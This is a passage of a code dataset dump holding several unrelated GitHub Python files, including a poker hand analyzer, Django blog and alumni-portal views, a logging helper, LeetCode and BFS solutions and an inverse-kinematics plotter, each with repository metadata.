hand_2.pop(len(hand_1) - 1)\n else:\n hand_1[len(hand_1) - 1].pop(len(hand_1[len(hand_1) - 1]) - 1)\n hand_2[len(hand_1) - 1].pop(len(hand_1[len(hand_1) - 1]) - 1)\n return self.tiebreak_recursive(hand_1,hand_2,ref_1,ref_2)\n else:\n if not (ref_1.low_ace and ref_2.low_ace):\n if hand_1[-1][-1][-1].suite_int < hand_2[-1][-1][-1].suite_int:\n return True\n else:\n if hand_1[-1][-2][-1].suite_int < hand_2[-1][-2][-1].suite_int:\n return True\n return False\n \nclass Hand:\n def __init__(self):\n self.hand = []\n self.value = 0\n self.value_str = None\n self.sorted = None\n self.groups = None\n self.low_ace = False\n def deal(self, card):\n self.hand.append(card)\n def sort(self):\n sorted_hand = []\n for card in self.hand:\n sorted_hand.append(card)\n n = len(sorted_hand)\n swapped = False\n for i in range(n-1):\n for j in range(0, n-i-1):\n if sorted_hand[j].face_int > sorted_hand[j + 1].face_int:\n swapped = True\n sorted_hand[j], sorted_hand[j + 1] = sorted_hand[j + 1], sorted_hand[j]\n elif sorted_hand[j].face_int == sorted_hand[j + 1].face_int:\n if sorted_hand[j].suite_int > sorted_hand[j + 1].suite_int:\n swapped = True\n sorted_hand[j], sorted_hand[j + 1] = sorted_hand[j + 1], sorted_hand[j]\n if not swapped:\n return sorted_hand\n return sorted_hand\n def group(self):\n temp = []\n if len(self.sorted) == 5:\n temp.append([])\n for card in self.sorted:\n temp[0].append(card)\n else:\n temp.append([])\n temp.append([])\n low = 2;\n for card in self.sorted:\n if len(card) < low:\n low = len(card)\n if low == 1:\n for card in self.sorted:\n if len(card) == 1:\n temp[0].append(card)\n else:\n temp[1].append(card)\n else:\n for card in self.sorted:\n if len(card) == 2:\n temp[0].append(card)\n else:\n temp[1].append(card)\n self.groups = temp\n \ntable = Poker_Table()\nprint(\"*** P O K E R H A N D A N A L Y Z E R ***\")\nif len(sys.argv) == 2:\n print(\"*** USING TEST DECK OF CARDS ***\")\n table.input_hands()\nelse:\n print(\"*** USING RANDOMIZED DECK OF CARDS ***\")\n 
print(\"*** Shuffled 52 card deck:\")\n table.print_deck(13)\n table.deal()\nprint(\"*** Here are the six hands...\")\ntable.print_hands()\nif not table.duplicate:\n print(\"*** Here is what remains in the deck...\")\n table.print_deck()\n print(\"--- WINNING HAND ORDER ---\")\n table.rank_hands()\n table.order_hands()\n table.print_hands()\nelse:\n print(\"*** ERROR - DUPLICATED CARD(S) FOUND IN DECK ***\")\n print(\"*** DUPLICATE(S): \", sep=\"\", end=\"\")\n duplicates = table.duplicate.sort()\n for card in duplicates:\n print(card.face,card.suite, sep=\"\", end=\" \")\n print(\" ***\")\n","repo_name":"charbygill/Five-Card-Stud","sub_path":"FiveCardStud.py","file_name":"FiveCardStud.py","file_ext":"py","file_size_in_byte":11535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24611706919","text":"import pickle, os, sys, gzip, re\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\n\nimport gensim\nfrom gensim.models import KeyedVectors\n\nsys.path.append (\"/u/flashscratch/d/datduong/GOmultitask/\")\nimport ProtSeq2GO.evaluation_metric as evaluation_metric\n\nimport blastp.ExpandGOSet as ExpandGOSet\n\n## can be sloppy , don't need a whole arg input.\n\ndef submitJobs (main_dir, data_dir, blast_result_dir, what_set, ontology_type, wordvec_file,wordvec_file_small,label_subset_file) :\n\n ## @blast_result_dir is where we output the blast score, this is not same as @data_dir... should change pipeline ? \n\n if wordvec_file_small == \"none\": \n ExpandGOSetOnBlast = ExpandGOSet.GOVector(wordvec_file,label_subset_file)\n else: \n ExpandGOSetOnBlast = ExpandGOSet.GOVector(wordvec_file,label_subset_file,wordvec_file_small=wordvec_file_small,cut_point=0.95)\n\n BlastResult = pickle.load ( open(blast_result_dir+what_set+\"-\"+ontology_type+\".dict.pickle\",\"rb\") )\n\n print ('number of prot with prediction from blast-style {}'.format(len(BlastResult))) \n \n BlastResultExpand = ExpandGOSetOnBlast.ExpandBlast(BlastResult)\n\n pickle.dump ( BlastResultExpand, open(blast_result_dir+what_set+\"-\"+ontology_type+\".expand.pickle\",\"wb\") )\n\n df = pd.read_csv(data_dir+what_set+\"-\"+ontology_type+\".tsv\",sep=\"\\t\")\n prot_array = list(df['Entry']) ## only need name to retain the same ordering\n prediction = ExpandGOSetOnBlast.dict2matrix(BlastResultExpand,prot_array)\n print (prediction)\n\n ## get true label\n true_label = pickle.load ( open(data_dir+what_set+\"-\"+ontology_type+\".TrueLabel.pickle\",\"rb\") )\n print ('number of prot in test set {}'.format(len(true_label)))\n true_label = ExpandGOSetOnBlast.truelabel2matrix(true_label,prot_array)\n print (true_label)\n\n print ('remove prot that blast did not find')\n get_found = np.where ( np.sum(prediction,1) > 0 ) [ 0 ]\n prediction = prediction[get_found,:]\n true_label = true_label[get_found,:]\n\n metric = evaluation_metric.all_metrics ( np.round(prediction), true_label, yhat_raw=prediction, k=15 )\n evaluation_metric.print_metrics( metric )\n\n ## !!!! 
\n    print ('\\n\\nnot expand GO set')\n    prediction = ExpandGOSetOnBlast.dict2matrix(BlastResult,prot_array)\n    get_found = np.where ( np.sum(prediction,1) > 0 ) [ 0 ]\n    prediction = prediction[get_found,:]\n    metric = evaluation_metric.all_metrics ( np.round(prediction), true_label, yhat_raw=prediction, k=15 )\n    evaluation_metric.print_metrics( metric )\n\n    print ('\\n\\nsee example')\n    print ( BlastResult['Q92543'] ) \n    print ( BlastResultExpand['Q92543'] ) \n\nif len(sys.argv)<9: ## run script, requires 8 arguments\n\tprint(\"Usage: \\n\")\n\tsys.exit(1)\nelse:\n\tsubmitJobs ( sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7], sys.argv[8] )\n\n\n\n","repo_name":"datduong/EncodeGeneOntology","sub_path":"blastp/NotUse/do_expand_set.py","file_name":"do_expand_set.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"47"} +{"seq_id":"21713153912","text":"import argparse\r\nimport math\r\nfrom pathlib import Path\r\n\r\nimport numpy as np\r\nfrom PIL import Image, ImageDraw\r\n\r\n\r\ndef load_JASC(f):\r\n    # check header and parse palette length\r\n    assert next(f) == \"JASC-PAL\\n\"\r\n    assert next(f) == \"0100\\n\"\r\n    count = int(next(f))\r\n\r\n    # parse entries\r\n    colors = np.zeros((count, 3), dtype=np.uint8)\r\n    for i in range(count):\r\n        colors[i, :] = [int(chan) for chan in next(f).split(\" \")]\r\n\r\n    # this ought to be the end of the file\r\n    assert not f.read()\r\n\r\n    return colors\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument(\"input\", type=Path)\r\n    parser.add_argument(\"-o\", dest=\"output\", type=Path, required=True)\r\n    parser.add_argument(\"--scale\", type=int, required=True)\r\n\r\n    args = parser.parse_args()\r\n\r\n    with open(args.input) as f:\r\n        palette = load_JASC(f)\r\n\r\n    cols = min(len(palette), 16)  # max 16 columns\r\n    rows = math.ceil(len(palette) / cols)\r\n\r\n    S = args.scale\r\n    img = Image.new(\"RGB\", (cols * S, rows * S))\r\n    draw = ImageDraw.Draw(img)\r\n\r\n    for i, rgb in enumerate(palette):\r\n        yy = i // cols\r\n        xx = i % cols\r\n        draw.rectangle((xx * S, yy * S, (xx + 1) * S, (yy + 1) * S), fill=tuple(rgb))\r\n\r\n    img.save(args.output)\r\n","repo_name":"mcejp/palette-tools","sub_path":"jasc-generate-swatch.py","file_name":"jasc-generate-swatch.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74499567821","text":"from typing import Any\nfrom django.contrib.auth.models import User\nfrom django.http import Http404\nfrom django.views.generic.list import ListView\nfrom django.shortcuts import redirect\nfrom django.utils.translation import gettext as _\n\nfrom wagtail.contrib.modeladmin.views import CreateView\nfrom wagtail.admin import messages\nfrom wagtail.search.models import Query\n\nfrom .models import BlogPostPage, PostCategoryPage\n\n\nclass UsersBlogPostListView(ListView):\n\n    model = BlogPostPage\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        user_name = self.kwargs.get('username', '')\n        author = User.objects.get(username=user_name)\n        context['posts'] = BlogPostPage.objects.filter(owner=author.id)\n        context['author'] = author\n        return context\n\n\nclass TagsBlogPostListView(ListView):\n\n    model = BlogPostPage\n\n    def get_context_data(self, **kwargs):\n        context = super().get_context_data(**kwargs)\n        tag = self.kwargs.get('tag', '')\n        context['posts'] = BlogPostPage.objects.filter(tags__name=tag)\n        
context['tag'] = tag\n return context\n\n\n\nclass CategoriesBlogPostListView(ListView):\n\n model = BlogPostPage\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n cat_id = self.kwargs.get('cat_id', '')\n if cat_id == 0:\n context['posts'] = BlogPostPage.objects.all()\n else: \n context['posts'] = BlogPostPage.objects.filter(category=cat_id).order_by(\"-created\")\n context['categories'] = PostCategoryPage.objects.all().order_by('category_title')\n context['cat_selected'] = PostCategoryPage.objects.filter(id=cat_id).first()\n return context\n\n\nclass SearchBlogPostListView(ListView):\n\n model = BlogPostPage\n\n def get(self, request, *args, **kwargs):\n self.object_list = self.get_queryset()\n allow_empty = self.get_allow_empty()\n\n if not allow_empty:\n if self.get_paginate_by(self.object_list) is not None and hasattr(self.object_list, 'exists'):\n is_empty = not self.object_list.exists()\n else:\n is_empty = not self.object_list\n if is_empty:\n raise Http404(_('Empty list and “%(class_name)s.allow_empty” is False.') % {\n 'class_name': self.__class__.__name__,\n })\n\n search_query = request.GET.get('query', None)\n if search_query:\n search_results = BlogPostPage.objects.order_by(\"-created\").search(search_query)\n Query.get(search_query).add_hit()\n else:\n search_results = BlogPostPage.objects.none()\n context = self.get_context_data()\n context['posts'] = search_results\n context['query'] = search_query\n return self.render_to_response(context)\n\n\nclass ProfileCreateView(CreateView):\n \n def form_valid(self, form):\n form.instance.user = self.request.user\n instance = form.save()\n messages.success(\n self.request, self.get_success_message(instance),\n buttons=self.get_success_message_buttons(instance)\n )\n return redirect(self.get_success_url())\n\n","repo_name":"ckan/ckan.org","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"70939713102","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, Http404\nfrom django.contrib import messages\nfrom django.views import View\nfrom django.utils import timezone\n\nfrom .models import Profile, Post, Products\nfrom .forms import PostForm, FeedbackForm\nfrom datetime import datetime\n\nimport pytz\n# Create your views here.\n\ndef index(request):\n return render(request, \"index.html\",{})\n\ndef contact(request):\n return render(request, \"contact.html\")\n\ndef about(request):\n return render(request, \"about.html\")\n# Display all alumni except the current logged in user\ndef displayAlumni(request):\n if request.user.is_authenticated: \n profiles = Profile.objects.exclude(user=request.user)\n return render(request, \"alumni_list.html\",{\"profiles\":profiles})\n else:\n messages.success(request, \"You must be logged in to view this page!\")\n return redirect('/')\ndef displayUserProfile(request, pk):\n if request.user.is_authenticated:\n profile = Profile.objects.get(user__id= pk)\n return render(request, \"user_profile.html\",{\"profile\":profile}) \n else:\n messages.success(request, \"You must be logged in to view this page!\")\n return redirect('/')\ndef editUserProfile(request, pk):\n if request.user.is_authenticated:\n # Redirect to original profile user \n if pk != request.user.id:\n return redirect(f'/edit_profile/{request.user.id}')\n \n # Get profile object\n profile = 
Profile.objects.get(user__id= pk)\n \n if request.method == 'POST':\n names = request.POST['fullName'].split()\n print(names)\n profile.user.first_name = names[0]\n profile.user.last_name = \" \".join(names[1:])\n profile.user.email = request.POST['email']\n profile.avatar = request.FILES.get('avatar',None)\n profile.save()\n profile.user.save()\n messages.success(request, \"Changes saved, successfully!\")\n return render(request, \"user_profile_edit.html\",{\"profile\":profile}) \n else:\n messages.success(request, \"You must be logged in to view this page!\")\n return redirect('/')\n\nclass PostListView( View ):\n \n def get(self, request, *args, **kwargs):\n posts = Post.objects.all().order_by(\"-publish_date\").filter(publish_date__lte=timezone.now().astimezone(pytz.utc))\n print(posts[0].created_at)\n print(posts[0].publish_date)\n print(timezone.now().astimezone(pytz.utc))\n print(len(posts))\n \n form = PostForm()\n return render(request, 'post_list.html', {'post_list' : posts, 'form':form})\n def post(self, request, *args, **kwargs):\n posts = Post.objects.all().order_by(\"-created_at\")\n form = PostForm(request.POST)\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.user = request.user\n new_post.save()\n return render(request, 'post_list.html', {'post_list' : posts, 'form':form})\n\nclass PostDetailView(View):\n def get(self, request, pk, *args, **kwargs):\n post = Post.objects.get(pk=pk)\n form = FeedbackForm()\n return render(request, 'post_detail.html',{'post':post, 'form':form})\n \nclass PostCreateView(View):\n def get(self, request, *args, **kwargs):\n form = PostForm(request.POST) \n return render(request, 'add_post.html', {'form':form})\n def post(self, request, *args, **kwargs):\n form = PostForm(request.POST)\n if form.is_valid():\n new_post = form.save(commit=False)\n new_post.user = request.user\n new_post.save()\n return render(request, 'add_post.html', {'form':form})\n \n# Products/Services\nclass ServiceListView(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'products.html',{}) \n \nclass CartListView(View):\n def get(self, request, *args, **kwargs):\n return render(request, \"cart.html\", {})\n \n\nclass DashboardView(View):\n def get(self, request, *args, **kwargs):\n return render(request, \"dashboard\\dashboard.html\", {})\n\n\nclass ProductAdd(View):\n def get(self, request, *args, **kwargs):\n \n return render(request, 'dashboard\\dashboard_product_add.html')\n def post(self,request,*args, **kwargs):\n if request.method == \"POST\" :\n data = request.POST\n product_name = data.get('product_name')\n product_category = data.get('product_category')\n product_subcategory = data.get('product_subcategory')\n product_price = data.get('product_price')\n product_desc = data.get('product_desc')\n product_image = request.FILES.get('product_image')\n Products.objects.create(\n product_name = product_name,\n product_category = product_category,\n product_subcategory = product_subcategory,\n product_price = product_price,\n product_desc = product_desc,\n product_image = product_image,\n )\n return redirect('/dashboard/dashboard_products')\n\nclass ProductDelete(View): \n def get (self,request, id,): \n products = Products.objects.get(id=id)\n products.delete()\n return redirect('/dashboard/dashboard_products')\nclass ProductUpdate(View):\n def get(self, request, id):\n products = Products.objects.get(id=id)\n context = {'products' : products}\n return render(request, 'dashboard\\dashboard_product_edit.html',context)\n \n def 
post(self,request,*args, **kwargs):\n        \n        if request.method == \"POST\" :\n            data = request.POST\n            product_id = data.get('product_id')\n            product_name = data.get('product_name')\n            product_category = data.get('product_category')\n            product_subcategory = data.get('product_subcategory')\n            # product_price = data.get('product_price')\n            product_desc = data.get('product_desc')\n            product_image = request.FILES.get('product_image')\n\n            products = Products.objects.get(id=product_id)\n\n            # plain assignments; a trailing comma here would store a one-element tuple in the field\n            products.product_name = product_name\n            products.product_category = product_category\n            products.product_subcategory = product_subcategory\n            # products.product_price = product_price\n            products.product_desc = product_desc\n            if product_image:\n                products.product_image = product_image\n            products.save()\n        return redirect('/dashboard/dashboard_products')\n    \n    \nclass ProductDetailView(View):\n    def get(self, request, *args, **kwargs):\n        products = Products.objects.all()\n        print(products)\n        return render(request, 'dashboard\\dashboard_product.html',{'products':products})\n    \n    def editProduct(request, id):\n        products = Products.objects.get(id = id)\n        return render(request, 'dashboard/dashborad_product_edit.html', {'products':products})\n    \n    def product_update(request, id):\n        products = Products.objects.get(id=id)\n        form = ProductsForm(request.POST, request.FILES, instance=products)\n        if form.is_valid():\n            form.save()\n            return redirect('product_list')\n        else:\n            form = ProductsForm(instance=products)\n        return render(request, 'dashboard/dashborad_product_edit.html', {'form': form})\n    \n    def product_destroy(request, id):\n        products = Products.objects.get(id=id)\n        products.delete()\n        return redirect('product_list')\n","repo_name":"rhranadu/alumniPortal","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12037024936","text":"from globals import *\nfrom controllers.SpaceController import SpaceController as Sc\nfrom schemas.SpaceSchema import SpaceSchema\nfrom classes import Space as Sp\n\n\nclass SpaceView:\n\n    \"\"\"Space module view class\"\"\"\n\n    def __init__(self, db):\n        self.object_collection = []\n        self.db = db\n\n    def home_view(self):\n        while True:\n            print(SPACE_VIEW_WELCOME_STR)\n            ans = input(\"value: \")\n            if ans == '1':\n                self.create_space_objects_view()\n                print('process ended')\n            if ans == '2':\n                self.add_locality_space_view()\n                print('process ended')\n            if ans == '3':\n                save = input('save objects ? 
y/n')\n if save == 'n':\n pass\n else:\n documents_array = []\n collection_name = input('name a collection to save your data')\n print(\"collection : {}\".format(collection_name))\n ans = input(\"confirm y/n\")\n if ans == 'n':\n pass\n else:\n collection = self.db[collection_name]\n for obj in self.object_collection:\n schema = SpaceSchema()\n res = schema.dump(obj)\n documents_array.append(res)\n collection.insert_many(documents_array)\n print(\"SUCCESS :\\n\"\n \"{} document inserted\".format(len(documents_array)))\n\n if ans == '4':\n self.add_continent_view()\n if ans == 'e':\n break\n\n def add_continent_view(self):\n locations = self.db['location_collection']\n for obj in self.object_collection:\n obj.continent_space = Sc.add_continent(obj, locations)\n print(obj.continent_space)\n\n def add_locality_space_view(self):\n \"\"\"\n extract locality location and produce the corresponding array\n :returns: locality ids array\n \"\"\"\n locations = self.db['locations']\n for obj in self.object_collection:\n res = Sc.add_locality_country_space(obj.space, locations)\n obj.locality_space = res[0]\n obj.country_space = res[1]\n obj.region_space = res[2]\n print(\"locality & country space added to each object\")\n\n def create_space_objects_view(self):\n\n empty_objects = 0\n\n show_coll_name = input(\"Select a show collection : \")\n locations_coll_name = input(\"Select a location collection :\")\n if show_coll_name in self.db.collection_names():\n show_collection = self.db[show_coll_name]\n if locations_coll_name in self.db.collection_names():\n location_collection = self.db[locations_coll_name]\n print(\"wait...\")\n for show in show_collection.find():\n\n show_id = show['_id']\n show_title = show[\"title\"]\n locations_array = Sc.get_location_array(show['_id'], location_collection, show_collection)\n space_obj = Sp.Space(show_id, show_title, locations_array)\n\n distance = Sc.distance(space_obj.space, location_collection)\n space_obj.distance = distance\n locations_name_array = Sc.locations_name_array(space_obj.space, location_collection)\n space_obj.locations_name = locations_name_array\n if len(space_obj.space) > 0:\n self.object_collection.append(space_obj)\n else:\n empty_objects += 1\n print(\"{} object created, {} empty show rejected\".format(len(self.object_collection), empty_objects))\n","repo_name":"rerouj/apptp-data-engine","sub_path":"app/views/SpaceView.py","file_name":"SpaceView.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14346169269","text":"import joblib\nfrom static.logic.text_pipeline import TextProcessor\n\ndef predict(text: str):\n # load model\n model = joblib.load('static/logic/datos/MLPClassifier.pkl')\n\n # get text from request\n prediction = model.predict([text])\n\n if prediction == 0:\n return 'negative'\n else:\n return 'positive'\n \ndef predict_with_list(texts: list):\n # load model\n model = joblib.load('static/logic/datos/MLPClassifier.pkl')\n\n # get text from request\n prediction = model.predict(texts)\n\n # Transform 0 for negative and 1 for positive\n prediction = ['negative' if pred == 0 else 'positive' for pred in prediction]\n\n return prediction\n","repo_name":"Zucaritas-BI/Proyecto-1-Parte-2","sub_path":"backend/static/logic/pipeline_predict.py","file_name":"pipeline_predict.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} 
+{"seq_id":"26607259148","text":"# encoding: utf-8\n'''\nhook logging for format log style\n\nCreate on May 27, 2017\n@author: Hongping Wang\n@change: 2017-06-01 Hongping Wang: initialization\n 2017-06-06 Hongping Wang: support write a new log file every day\n 2017-07-27 Qiangqiang Wei: support the log for different project\n 2017-07-28 Qiangqiang Wei: create the new log_base.py and move the code to this script\n 2017-11-04 Hongping Wang: support write log to file and standard output synchronously\n'''\nimport os\nimport logging\n\nfrom logging.handlers import RotatingFileHandler\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport config\n\nclass AutoTestLog():\n '''\n The auto test log\n '''\n\n def create_logger(self, log_file_name='{0}/e2etest_running.log'.format(config.BASE_DIR),\n log_level=logging.DEBUG,\n log_date_format='%Y-%m-%d %H:%M:%S%z',\n log_formater='%(asctime)s %(filename)s:%(funcName)s %(levelname)s [line:%(lineno)d] %(message)s',\n max_log_files=3,\n one_day_one_file=True,\n max_log_file_size=10485760,\n log_to_standard_output=False\n ):\n '''\n @summary: create the logger\n @param log_file_name: the log file name, should be absolute path. default value is /tmp/vamp/videocenter_running.log\n if the value is None or \"\", print the log to standard output\n @param log_level: Integer of the log level. default value is logging.DEBUG\n @param max_log_files: the max number of files. It is valid when one_day_one_file equal False. default value is 3\n @param one_day_one_file: whether only create a file in one day. default value is True, one day one log file\n @param max_log_file_size: the max size of the log file. unit is byte. default value is 10 MB\n @param log_date_format: String of log date format. default value is '%Y-%m-%d %H:%M:%S%z', like 2017-06-01 11:44:06+0000\n @param log_to_standard_output: whether print logs into standard output, this argument will ignore log_file_name value\n @return: the logger\n '''\n # initialize log file\n if log_file_name:\n log_file_name = os.path.abspath(log_file_name) # change path to absolute path\n if not os.path.exists(os.path.dirname(log_file_name)):\n os.makedirs(os.path.dirname(log_file_name))\n\n # write log into file or standard output\n if log_file_name and type(log_file_name) == type('') and log_file_name != '':\n # write log to file\n logger = logging.getLogger(log_file_name)\n logger.setLevel(log_level)\n\n # write a new log file every day\n if one_day_one_file:\n Rthandler = TimedRotatingFileHandler(log_file_name, when='D', backupCount=max_log_files)\n else:\n Rthandler = RotatingFileHandler(log_file_name, maxBytes=max_log_file_size, backupCount=max_log_files)\n formatter = logging.Formatter(fmt=log_formater, datefmt=log_date_format)\n Rthandler.setFormatter(formatter)\n logger.addHandler(Rthandler)\n\n # write log to standard output synchronously\n if log_to_standard_output:\n console = logging.StreamHandler()\n console.setLevel(log_level)\n console.setFormatter(formatter)\n logger.addHandler(console)\n\n # write log to standard output default\n else:\n logging.basicConfig(level=log_level, format=log_formater, datefmt=log_date_format)\n logger = logging\n\n return logger\n\n# define application log file path\n__log = AutoTestLog().create_logger(log_to_standard_output=True)\ncritical = __log.critical\nfatal = __log.fatal\nerror = __log.error\nwarning = __log.warning\nwarn = __log.warn\ninfo = __log.info\ndebug = __log.debug\nexception = __log.exception\n\n\n\n#1.日志等级分别有以下几种:\n\n #CRITICAL : 'CRITICAL',\n #ERROR : 
'ERROR',\n #WARNING : 'WARNING',\n #INFO : 'INFO',\n #DEBUG : 'DEBUG',\n #NOTSET : 'NOTSET',\n\n #一旦设置了日志等级,则调用比等级低的日志记录函数则不会输出\n #设置日志的步骤:handler = logging.handlers.RotatingFileHandler(LOG_FILE, maxBytes = 1024*1024, backupCount = 5) # 实例化handler\n #fmt = '%(asctime)s - %(filename)s:%(lineno)s - %(name)s - %(message)s'\n\n #formatter = logging.Formatter(fmt) # 实例化formatter\n #handler.setFormatter(formatter) # 为handler添加formatter\n\n #logger = logging.getLogger('tst') # 获取名为tst的logger\n #logger.addHandler(handler) # 为logger添加handler\n #logger.setLevel(logging.DEBUG)\n\n\n\n\n\n\n\n\n\n#2. 自python2.6开始,新增了一种格式化字符串的函数str.format(),可谓威力十足\n #花括号声明{}、用于渲染前的参数引用声明, 花括号里可以用数字代表引用参数的序号, 或者 变量名直接引用。\n #log_file_name='{0}/e2etest_running.log'.format(config.BASE_DIR)\n # 例1: data = {'first': 'Hodor', 'last': 'Hodor!'}\n # old: '%(first)s %(last)s' % data\n # new: '{first} {last}'.format(**data)\n #output: Hodor Hodor1\n\n # 例2:\n #'{:^10}'.format('test')\n #output: ' test '\n #'{:<10}'.format('test')\n # output:'test '\n\n\n\n# 3.TimedRotatingFileHandler:\n # TimedRotatingFileHandler(filename [,when [,interval [,backupCount]]])\n #filename 是输出日志文件名的前缀\n #when 是一个字符串的定义如下:\n #“S”: Seconds\n #“M”: Minutes\n #“H”: Hours\n #“D”: Days\n #“W”: Week day (0=Monday)\n #“midnight”: Roll over at midnight\n #backupCount 是保留日志个数。默认的0是不会自动删除掉日志。若设3,则在文件的创建过程中\n #库会判断是否有超过这个3,若超过,则会从最先创建的开始删除。\n #RotatingFileHandler:\n\n","repo_name":"Tingmeili/Python","sub_path":"learn_python/log_base.py","file_name":"log_base.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"73080613263","text":"from typing import List\n\n\nclass Solution:\n def maximumScore(self, nums: List[int], multipliers: List[int]) -> int:\n\n l = len(multipliers)\n\n def dfs(i, j, idx=0, memo={}):\n key = f'{i},{j},{idx}'\n if key in memo:\n return memo[key]\n if idx >= len(multipliers):\n return 0\n res = max(nums[i] * multipliers[idx] + dfs(i + 1, j, idx + 1, memo),\n nums[j] * multipliers[idx] + dfs(i, j - 1, idx + 1, memo))\n memo[key] = res\n return res\n\n return dfs(0, len(nums) - 1)\n\n def maximumScore_dp(self, nums: List[int], muls: List[int]) -> int:\n l = len(nums)\n dp = [[0 for _ in range(l)] for _ in range(l)]\n\n def getScore(i, j, idx=0):\n if idx >= len(muls):\n return 0\n if dp[i][j] == 0:\n dp[i][j] = max(nums[i] * muls[idx] + getScore(i + 1, j, idx + 1),\n nums[j] * muls[idx] + getScore(i, j - 1, idx + 1))\n\n return dp[i][j]\n\n getScore(0, l - 1)\n return dp[0][-1]\n\n\nnums = [-5, -3, -3, -2, 7, 1]\nmultipliers = [-10, -5, 3, 4, 6]\n\ns = Solution()\nprint(s.maximumScore(nums, multipliers))\nprint(s.maximumScore_dp(nums, multipliers))\n","repo_name":"BYJRK/LeetCode-Solutions","sub_path":"Problems/Dynamic Programming/1770. Maximum Score from Performing Multiplication Operations.py","file_name":"1770. 
Maximum Score from Performing Multiplication Operations.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16280714991","text":"from sys import stdin as s\r\nfrom collections import deque\r\n\r\nN, M = map(int, s.readline().rstrip().split())\r\n\r\ngraph = [[] for _ in range(N + 1)]\r\nfor i in range(M):\r\n a, b = map(int, s.readline().rstrip().split())\r\n graph[a].append(b)\r\n graph[b].append(a)\r\n\r\nanswer = [0, 999999]\r\nfor i in range(1, N + 1):\r\n queue = deque([graph[i]])\r\n visited = [False] * (N + 1)\r\n\r\n score = [-1] * N\r\n level = 1\r\n while queue[0]:\r\n temp = []\r\n pop = queue.popleft()\r\n for n in pop:\r\n if not visited[n]:\r\n visited[n] = True\r\n temp += graph[n]\r\n if score[n - 1] == -1:\r\n score[n - 1] = level\r\n level += 1\r\n queue.append(temp)\r\n\r\n if answer[1] > sum(score) - score[i - 1]:\r\n answer[0] = i\r\n answer[1] = sum(score) - score[i - 1]\r\n\r\nprint(answer[0])\r\n","repo_name":"SeoYoungDeok/Coding_Test","sub_path":"백준/Silver/1389. 케빈 베이컨의 6단계 법���/케빈 베이컨의 6단계 법칙.py","file_name":"케빈 베이컨의 6단계 법칙.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74207943181","text":"from math import degrees, cos, sin, sqrt\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom matplotlib.lines import Line2D\nfrom Kinematics import Kinematics\n# from AnglePlot import get_angle_plot, get_angle_text\nfrom matplotlib.patches import Arc\nimport random\n\n\ndef distancia(x1, y1, x2, y2):\n return sqrt((x2-x1)**2+(y2-y1)**2)\n\n\ndef plotInverseK(l1, l2, px, py):\n plot_limit = l1 + l2\n\n model = Kinematics(l1, l2)\n theta1, theta2 = model.makeInverse(px, py)\n theta1 = -theta1 if False else theta1\n\n x0 = 0\n y0 = 0\n x1 = l1*cos(theta1)\n y1 = l1*sin(theta1)\n x2 = x1+l2*cos(theta1+theta2)\n y2 = y1+l2*sin(theta1+theta2)\n x3 = x1+l2*cos(theta1)\n y3 = y1+l2*sin(theta1)\n\n if distancia(px, py, x2, y2) > 0.0001:\n theta1 = -theta1\n x0 = 0\n y0 = 0\n x1 = l1*cos(theta1)\n y1 = l1*sin(theta1)\n x2 = x1+l2*cos(theta1+theta2)\n y2 = y1+l2*sin(theta1+theta2)\n x3 = x1+l2*cos(theta1)\n y3 = y1+l2*sin(theta1)\n\n print(degrees(theta1), degrees(theta2))\n\n fig = plt.figure()\n ax = fig.add_subplot(\n 1, 1, 1, xlim=(-plot_limit, plot_limit), ylim=(-plot_limit, plot_limit))\n\n line_1 = Line2D([x0, x1], [y0, y1], linewidth=1,\n linestyle=\"-\", color=\"blue\")\n line_2 = Line2D([x1, x2], [y1, y2], linewidth=1,\n linestyle=\"-\", color=\"cyan\")\n line_3 = Line2D([x1, x3], [y1, y3], linewidth=1,\n linestyle=\"--\", color=\"cyan\", alpha=0.4)\n\n ax.add_line(line_1)\n ax.add_line(line_2)\n ax.add_line(line_3)\n\n arc1 = Arc(\n [0, 0],\n plot_limit/10,\n plot_limit/10,\n 0,\n 0 if theta1 > 0 else degrees(theta1),\n degrees(theta1) if theta1 > 0 else 0,\n color=\"blue\"\n )\n ax.add_patch(arc1)\n\n ax.text(\n plot_limit/10*cos(theta1/2),\n plot_limit / 15*sin(theta1/2),\n \"%0.2f\" % degrees(theta1)+u\"\\u00b0\",\n fontsize=8,\n color=\"blue\"\n )\n\n arc2 = Arc(\n [x1, y1],\n plot_limit/10,\n plot_limit/10,\n degrees(theta1),\n degrees(theta2) if theta2 < 0 else 0,\n 0 if theta2 < 0 else degrees(theta2),\n color=\"cyan\" if 